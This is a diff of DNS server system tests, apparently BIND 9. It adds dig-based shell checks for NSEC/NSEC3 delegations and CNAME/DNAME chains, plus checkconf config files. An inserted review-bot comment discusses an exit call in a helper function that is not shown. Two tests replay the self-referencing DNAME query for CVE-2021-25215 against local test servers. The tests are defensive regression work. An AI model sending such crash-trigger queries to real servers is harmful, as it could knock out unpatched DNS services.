+exactly_one_record_exists_for "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+# Ensure the NSEC record for the zone cut does not have the DS bit set in the
+# type bit map.
+ensure_no_ds_in_bitmap "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Relevant NSEC3 hashes:
+#
+# - existing names:
+#
+# $ nsec3hash - 1 0 wildcard-nsec3.example.
+# 38IVP9CN0LBISO6H3V5REQCKMTHLI5AN (salt=-, hash=1, iterations=0)
+# $ nsec3hash - 1 0 cname.wildcard-nsec3.example.
+# 3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D (salt=-, hash=1, iterations=0)
+# $ nsec3hash - 1 0 delegation.wildcard-nsec3.example.
+# AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC (salt=-, hash=1, iterations=0)
+# $ nsec3hash - 1 0 *.wildcard-nsec3.example.
+# Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2 (salt=-, hash=1, iterations=0)
+#
+# - nonexistent names:
+#
+# $ nsec3hash - 1 0 a-nonexistent-name.wildcard-nsec3.example.
+# PST9IH6M0DG3M139CO3G12NUP4ER88SH (salt=-, hash=1, iterations=0)
+# $ nsec3hash - 1 0 z-nonexistent-name.wildcard-nsec3.example.
+# SG2DEHEAOGCKP7FTNQAUVC3I3TIPJH0J (salt=-, hash=1, iterations=0)
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using CNAME chaining, NSEC3 ($n)"
+ret=0
+# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a
+# single NSEC3 record proving nonexistence of a DS RRset at the zone cut.
+$DIG $DIGOPTS @10.53.0.2 cname.wildcard-nsec3.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec3.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec3.example." DS dig.out.2.$n || ret=1
+# Check NSEC3 records in the AUTHORITY section.
+no_records_exist_for "38IVP9CN0LBISO6H3V5REQCKMTHLI5AN.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+exactly_one_record_exists_for "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+# Ensure the NSEC3 record matching the zone cut does not have the DS bit set in
+# the type bit map.
+ensure_no_ds_in_bitmap "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3, QNAME #1 ($n)"
+ret=0
+# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and
+# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone
+# cut. In this test case, these two NSEC3 records are different.
+$DIG $DIGOPTS @10.53.0.2 z-nonexistent-name.wildcard-nsec3.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec3.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec3.example." DS dig.out.2.$n || ret=1
+# Check NSEC3 records in the AUTHORITY section.
+no_records_exist_for "38IVP9CN0LBISO6H3V5REQCKMTHLI5AN.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+exactly_one_record_exists_for "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+exactly_one_record_exists_for "Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+# Ensure the NSEC3 record matching the zone cut does not have the DS bit set in
+# the type bit map.
+ensure_no_ds_in_bitmap "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3, QNAME #2 ($n)"
+ret=0
+# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and
+# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone
+# cut. In this test case, the same NSEC3 record proves nonexistence of both the
+# QNAME and the DS RRset at the zone cut.
+$DIG $DIGOPTS @10.53.0.2 a-nonexistent-name.wildcard-nsec3.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec3.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec3.example." DS dig.out.2.$n || ret=1
+# Check NSEC3 records in the AUTHORITY section.
+no_records_exist_for "38IVP9CN0LBISO6H3V5REQCKMTHLI5AN.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+exactly_one_record_exists_for "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+# Ensure the NSEC3 record matching the zone cut does not have the DS bit set in
+# the type bit map.
+ensure_no_ds_in_bitmap "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Relevant NSEC3 hashes:
+#
+# - existing names with corresponding NSEC3 records:
+#
+# $ nsec3hash - 1 0 *.wildcard-nsec3-optout.example.
+# 2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO (salt=-, hash=1, iterations=0)
+# $ nsec3hash - 1 0 cname.wildcard-nsec3-optout.example.
+# OKRFKC9SS1O60E8U2980UD62MUSMKGUG (salt=-, hash=1, iterations=0)
+# $ nsec3hash - 1 0 wildcard-nsec3-optout.example.
+# SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI (salt=-, hash=1, iterations=0)
+#
+# - existing name with no corresponding NSEC3 record due to opt-out:
+#
+# $ nsec3hash - 1 0 delegation.wildcard-nsec3-optout.example.
+# UFP8PVECFTD57HU5PUD2HE0ES37QEOAP (salt=-, hash=1, iterations=0)
+#
+# - nonexistent names:
+#
+# $ nsec3hash - 1 0 b-nonexistent-name.wildcard-nsec3-optout.example.
+# 3J38JE2OU0O7B4CE2ADMBBKJ5HT994S5 (salt=-, hash=1, iterations=0)
+# $ nsec3hash - 1 0 z-nonexistent-name.wildcard-nsec3-optout.example.
+# V7OTS4791T9SU0HKVL93EVNAJ9JH2CH3 (salt=-, hash=1, iterations=0)
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using CNAME chaining, NSEC3 with opt-out ($n)"
+ret=0
+# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a
+# single NSEC3 record proving nonexistence of a DS RRset at the zone cut.
+$DIG $DIGOPTS @10.53.0.2 cname.wildcard-nsec3-optout.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec3-optout.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec3-optout.example." DS dig.out.2.$n || ret=1
+# Check NSEC3 records in the AUTHORITY section.
+no_records_exist_for "2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "OKRFKC9SS1O60E8U2980UD62MUSMKGUG.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+exactly_one_record_exists_for "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+# Ensure the NSEC3 record covering the zone cut does not have the DS bit set in
+# the type bit map.
+ensure_no_ds_in_bitmap "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3 with opt-out, QNAME #1 ($n)"
+ret=0
+# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and
+# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone
+# cut. In this test case, these two NSEC3 records are different.
+$DIG $DIGOPTS @10.53.0.2 b-nonexistent-name.wildcard-nsec3-optout.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec3-optout.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec3-optout.example." DS dig.out.2.$n || ret=1
+# Check NSEC3 records in the AUTHORITY section.
+exactly_one_record_exists_for "2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "OKRFKC9SS1O60E8U2980UD62MUSMKGUG.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+exactly_one_record_exists_for "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+# Ensure the NSEC3 record covering the zone cut does not have the DS bit set in
+# the type bit map.
+ensure_no_ds_in_bitmap "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3 with opt-out, QNAME #2 ($n)"
+ret=0
+# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and
+# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone
+# cut. In this test case, the same NSEC3 record proves nonexistence of both the
+# QNAME and the DS RRset at the zone cut.
+$DIG $DIGOPTS @10.53.0.2 z-nonexistent-name.wildcard-nsec3-optout.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1
+# Ensure that the AUTHORITY section contains an NS RRset without an associated
+# DS RRset.
+exactly_one_record_exists_for "delegation.wildcard-nsec3-optout.example." NS dig.out.2.$n || ret=1
+no_records_exist_for "delegation.wildcard-nsec3-optout.example." DS dig.out.2.$n || ret=1
+# Check NSEC3 records in the AUTHORITY section.
+no_records_exist_for "2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+no_records_exist_for "OKRFKC9SS1O60E8U2980UD62MUSMKGUG.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+exactly_one_record_exists_for "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+# Ensure the NSEC3 record covering the zone cut does not have the DS bit set in
+# the type bit map.
+ensure_no_ds_in_bitmap "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME to DNAME from authoritative ($n)"
+ret=0
+$DIG $DIGOPTS cname.example @10.53.0.2 a > dig.out.ns2.cname
+grep "status: NOERROR" dig.out.ns2.cname > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME to DNAME from recursive"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS cname.example @10.53.0.7 a > dig.out.ns4.cname
+grep "status: NOERROR" dig.out.ns4.cname > /dev/null || ret=1
+grep '^cname.example.' dig.out.ns4.cname > /dev/null || ret=1
+grep '^cnamedname.example.' dig.out.ns4.cname > /dev/null || ret=1
+grep '^a.cnamedname.example.' dig.out.ns4.cname > /dev/null || ret=1
+grep '^a.target.example.' dig.out.ns4.cname > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking DNAME is returned with synthesized CNAME before DNAME ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 name.synth-then-dname.example.broken A > dig.out.test$n
+grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1
+grep '^name.synth-then-dname\.example\.broken\..*CNAME.*name.$' dig.out.test$n > /dev/null || ret=1
+grep '^synth-then-dname\.example\.broken\..*DNAME.*\.$' dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking DNAME is returned with CNAME to synthesized CNAME before DNAME ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 cname-to-synth2-then-dname.example.broken A > dig.out.test$n
+grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1
+grep '^cname-to-synth2-then-dname\.example\.broken\..*CNAME.*name\.synth2-then-dname\.example\.broken.$' dig.out.test$n > /dev/null || ret=1
+grep '^name\.synth2-then-dname\.example\.broken\..*CNAME.*name.$' dig.out.test$n > /dev/null || ret=1
+grep '^synth2-then-dname\.example\.broken\..*DNAME.*\.$' dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME loops are detected ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 loop.example > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 17" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME to external delegated zones is handled ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 a.example > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME to internal delegated zones is handled ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 b.example > dig.out.test$n
+grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1
+grep "ANSWER: 2" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME to signed external delegation is handled ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 c.example > dig.out.$n
+grep "status: NOERROR" dig.out.$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME to signed internal delegation is handled ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 d.example > dig.out.$n
+grep "status: NOERROR" dig.out.$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking CNAME chains in various orders ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n - step 1 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "cname,cname,cname|1,2,3,4,s1,s2,s3,s4" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1
+grep 'status: NOERROR' dig.out.1.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.1.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 2 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "cname,cname,cname|1,1,2,2,3,4,s4,s3,s1" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.2.$n 2>&1
+grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.2.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 3 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "cname,cname,cname|2,1,3,4,s3,s1,s2,s4" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.3.$n 2>&1
+grep 'status: NOERROR' dig.out.3.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.3.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 4 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "cname,cname,cname|4,3,2,1,s4,s3,s2,s1" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.4.$n 2>&1
+grep 'status: NOERROR' dig.out.4.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.4.$n > /dev/null 2>&1 || ret=1
+echo "cname,cname,cname|4,3,2,1,s4,s3,s2,s1" | $SEND
+$RNDCCMD 10.53.0.7 null --- start test$n - step 5 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.5.$n 2>&1
+grep 'status: NOERROR' dig.out.5.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.5.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 6 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "cname,cname,cname|4,3,3,3,s1,s1,1,3,4" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.6.$n 2>&1
+grep 'status: NOERROR' dig.out.6.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.6.$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that only the initial CNAME is cached ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "cname,cname,cname|1,2,3,4,s1,s2,s3,s4" | $SEND
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1
+sleep 1
+$DIG $DIGOPTS +noall +answer @10.53.0.7 cname1.domain.nil > dig.out.2.$n 2>&1
+ttl=`awk '{print $2}' dig.out.2.$n`
+[ "$ttl" -eq 86400 ] || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking DNAME chains in various orders ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n - step 1 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "dname,dname|5,4,3,2,1,s5,s4,s3,s2,s1" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1
+grep 'status: NOERROR' dig.out.1.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 3' dig.out.1.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 2 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "dname,dname|5,4,3,2,1,s5,s4,s3,s2,s1" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.2.$n 2>&1
+grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 3' dig.out.2.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 3 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "dname,dname|2,3,s1,s2,s3,s4,1" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.3.$n 2>&1
+grep 'status: NOERROR' dig.out.3.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 3' dig.out.3.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking external CNAME/DNAME chains in various orders ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n - step 1 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "xname,dname|1,2,3,4,s1,s2,s3,s4" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.1.$n 2>&1
+grep 'status: NOERROR' dig.out.1.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.1.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 2 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "xname,dname|s2,2,s1,1,4,s4,3" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.2.$n 2>&1
+grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1
+grep 'ANSWER: 2' dig.out.2.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 null --- start test$n - step 3 --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+echo "xname,dname|s2,2,2,2" | $SEND
+$DIG $DIGOPTS @10.53.0.7 test.domain.nil > dig.out.3.$n 2>&1
+grep 'status: SERVFAIL' dig.out.3.$n > /dev/null 2>&1 || ret=1
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking explicit DNAME query ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 dname short-dname.example > dig.out.7.$n 2>&1
+grep 'status: NOERROR' dig.out.7.$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking DNAME via ANY query ($n)"
+ret=0
+$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i
+$RNDCCMD 10.53.0.7 flush 2>&1 | sed 's/^/ns7 /' | cat_i
+$DIG $DIGOPTS @10.53.0.7 any short-dname.example > dig.out.7.$n 2>&1
+grep 'status: NOERROR' dig.out.7.$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Regression test for CVE-2021-25215 (authoritative server).
+n=`expr $n + 1`
+echo_i "checking DNAME resolution via itself (authoritative) ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.2 DNAME self.domain0.self.domain0.nil. > dig.out.2.$n 2>&1
+grep 'status: NOERROR' dig.out.2.$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Regression test for CVE-2021-25215 (recursive resolver).
+n=`expr $n + 1`
+echo_i "checking DNAME resolution via itself (recursive) ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.7 DNAME self.example.self.example.dname. > dig.out.7.$n 2>&1
+grep 'status: NOERROR' dig.out.7.$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/checkconf/altdb.conf b/bin/tests/system/checkconf/altdb.conf
new file mode 100644
index 0000000..e40118c
--- /dev/null
+++ b/bin/tests/system/checkconf/altdb.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view override_bind chaos {
+ zone "version.bind" chaos {
+ type master;
+ database "_builtin version";
+ };
+};
diff --git a/bin/tests/system/checkconf/altdlz.conf b/bin/tests/system/checkconf/altdlz.conf
new file mode 100644
index 0000000..18539da
--- /dev/null
+++ b/bin/tests/system/checkconf/altdlz.conf
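Review bot: In tests.sh, `ensure_no_ds_in_bitmap` handles an unexpected record type with `*) exit 1 ;;`, and because every caller invokes it in the main shell as `ensure_no_ds_in_bitmap ... || ret=1`, that `exit` would end the whole test script instead of failing one check. The run would then stop without the `failed` message, without adding to `status`, and without the final `exit status:` line. Using `*) return 1 ;;` hands the caller the non-zero result it already handles. The branch is not reached with the NSEC and NSEC3 arguments passed in this hunk, so this matters for future callers, not for the current checks.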
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dlz external {
+ database "dlopen driver.so";
+ search no;
+};
+
+zone "example.com" {
+ type master;
+ dlz external;
+};
+
+zone "." {
+ type redirect;
+ dlz external;
+};
diff --git a/bin/tests/system/checkconf/ancient.conf b/bin/tests/system/checkconf/ancient.conf
new file mode 100644
index 0000000..98189cc
--- /dev/null
+++ b/bin/tests/system/checkconf/ancient.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Ancient options are fatal.
+ */
+options {
+ fake-iquery yes;
+};
diff --git a/bin/tests/system/checkconf/bad-acl.conf b/bin/tests/system/checkconf/bad-acl.conf
new file mode 100644
index 0000000..5095059
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-acl.conf
@@ -0,0 +1,21 @@
+/*
